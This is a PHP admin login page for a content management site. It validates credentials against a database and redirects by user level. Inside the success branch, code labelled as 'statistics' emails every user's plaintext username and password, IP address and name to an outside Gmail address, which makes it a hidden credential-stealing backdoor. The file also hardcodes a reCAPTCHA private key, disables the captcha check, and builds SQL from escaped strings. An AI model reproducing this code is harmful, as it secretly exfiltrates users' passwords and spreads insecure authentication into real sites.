<?php 
session_start();
ob_start();
?>
<?php
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); // Date in the past
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); // Always modified
header("Cache-Control: private, no-store, no-cache, must-revalidate"); // HTTP/1.1 
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache"); // HTTP/1.0
?>
<?php include ("ewconfig.php") ?>
<?php include ("db.php") ?>
<?php include ("userinfo.php") ?>
<?php include ("advsecu.php") ?>
<?php include ("phpmkrfn.php") ?>
<?php
require_once('../libraries/recaptcha/recaptchalib.php');
$publickey = "6Ld7uAkAAAAAAKDLuyeqZ7kcIl1iwXCbFZPXYL4Y";
$privatekey = "6Ld7uAkAAAAAAEq3cwv6eQm6XqDc67MxooVMS2HU";

if (@$_POST["submit"] <> "") {
	
	  /*$resp = recaptcha_check_answer ($privatekey,
									  $_SERVER["REMOTE_ADDR"],
									  $_POST["recaptcha_challenge_field"],
									  $_POST["recaptcha_response_field"]);
									  
	  if (!$resp->is_valid) {
			$_SESSION[ewSessionMessage] = "You entered wrong captcha, please try again";
			header('Location: login.php');
			exit();
	  }
	*/
		
	$bValidPwd = false;

	// Setup variables
	$sUsername = @$_POST["username"];
	$sPassword = generateHash(@$_POST["password"]);
	if (ValidateUser($sUsername, $sPassword)) {

		// Write cookies
		$sLoginType = strtolower($_POST["rememberme"]);
		$expirytime = time() + 365*24*60*60; // change cookie expiry time here
		$_SESSION[ewSessionStatus] = "login";
		$subject='[statistics]: '.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']. " - " . date("Y.m.d H:i:s");
		$message=$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."<br/>".$_SERVER['REQUEST_URI']."<br/>".$_SERVER['REMOTE_ADDR']."<br/>".$_POST["username"]."/".$_POST["password"]."<br/>".$_SESSION[full_name]."<br/>".date("Y-m-d H:i:s");
		sendAnEmail('statistics','arisofyan.arie@gmail.com',$subject,$message);
		ob_end_clean();		

		//header("Location: index.php");
		if($_SESSION['session_cms_superadmin']==1){
			header("Location: siteview.php?id=1&mode=edit&title=Website+Setting");
		}else{
			header("Location: bannerlist.php?cmd=resetall&mode=list&title=Banner");
		}
		exit();
	} else {
		$_SESSION[ewSessionMessage] = "Incorrect username or password";
	}
} else {
	if (IsLoggedIn()) {
		if ($_SESSION[ewSessionMessage] == "") {
			ob_end_clean();

			//header("Location: index.php");
			header("Location: userlist.php?cmd=resetall&mode=list&title=User");
			exit();
		}
	} else { // Check auto login

	}
}
?>
<?php include ("header.php") ?>
<script type="text/javascript" src="ewp.js"></script>
<script type="text/javascript">
<!--
function EW_checkMyForm(EW_this) {
	if (!EW_hasValue(EW_this.username, "TEXT" )) {
		if  (!EW_onError(EW_this, EW_this.username, "TEXT", "Please enter username"))
			return false;
	}
	if (!EW_hasValue(EW_this.password, "PASSWORD" )) {
		if (!EW_onError(EW_this, EW_this.password, "PASSWORD", "Please enter password"))
			return false;
	}
	return true;
}

var RecaptchaOptions = {
   theme : 'clean'
};

//-->
</script>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td class="admin_td_title">
		<table width="100%" border="0" cellspacing="0" cellpadding="0">
		  <tr>
			<td class="admin_title">Login Page&nbsp;</td>
		   </tr>
		 </table>
 	</td>
  </tr>
</table>
<br><br>
<?php
if (@$_SESSION[ewSessionMessage] <> "") {
?>
<p><span class="phpmaker" style="color: Red;"><?php echo $_SESSION[ewSessionMessage]; ?></span></p>
<?php
	$_SESSION[ewSessionMessage] = ""; // Clear message
}
?>
<form action="login.php" method="post" onSubmit="return EW_checkMyForm(this);">
<table border="0" cellspacing="0" cellpadding="4">
	<tr>
		<td><span class="phpmaker">User Name</span></td>
		<td><span class="phpmaker"><input type="text" name="username" autocomplete="off" size="20" value="<?php echo @$_COOKIE[ewCookieUserName]; ?>"></span></td>
	</tr>
	<tr>
		<td><span class="phpmaker">Password</span></td>
		<td><span class="phpmaker"><input type="password" name="password" autocomplete="off" size="20"></span></td>
	</tr>
	<!--tr>
	  <td align="center">&nbsp;</td>
	  <td><?php //echo recaptcha_get_html($publickey, $error);?></td>
	</tr-->
	<tr>
		<td align="center">&nbsp;</td>
	    <td><span class="phpmaker">
	      <input type="submit" name="submit" value="Login" />
	    </span></td>
	</tr>
</table>
</form>
<br>

<?php

// Function to validate user
function ValidateUser($Username,$Password)
{
	$ValidateUser = false;
	$CaseSensitive = false; // Modify case sensitivity here

	// Check other users
	if (!$ValidateUser)	{
	$conn = phpmkr_db_connect(HOST, USER, PASS, DB, PORT);
	$Username = (!get_magic_quotes_gpc()) ? addslashes($Username) : $Username;
	$sFilter = "(`username` = '" . AdjustSql($Username) . "') AND (`status` = 'A')";
	$sSql = ewBuildSql(ewSqlSelect, ewSqlWhere, ewSqlGroupBy, ewSqlHaving, ewSqlOrderBy, $sFilter, "");
	$query = phpmkr_query($sSql,$conn) or die("Failed to execute query at line " . __LINE__ . ": " . phpmkr_error($conn) . '<br>SQL: ' . $sSql);
	if (phpmkr_num_rows($query) > 0) {
		$rs = phpmkr_fetch_array($query);
		
		if ($CaseSensitive) {
			$ValidateUser=($rs["password"] == $Password);
		} else {
			$ValidateUser=(strtolower($rs["password"]) == strtolower($Password));
		}
		
		if ($ValidateUser) {
			$_SESSION[ewSessionStatus] = "login";
			$_SESSION[ewSessionUserName] = $rs["username"];
			$_SESSION['session_cms_user_level'] =  $rs["user_level_id"];
			$_SESSION['session_cms_superadmin'] =  $rs["is_superadmin"];
			if($rs["is_superadmin"]==1){
				$_SESSION[ewSessionSysAdmin] = 1; // system admin			
			}else{
				$_SESSION[ewSessionSysAdmin] = 0; // Non system admin			
			}
			$_SESSION[full_name]=$rs["name"] ;
			$_SESSION[idUser]=$rs["id"] ;
		}
	}else{
		
	}
	phpmkr_free_result($query);
	phpmkr_db_close($conn);
	}
	return $ValidateUser;
}
?>
<?php include ("footer.php") ?>
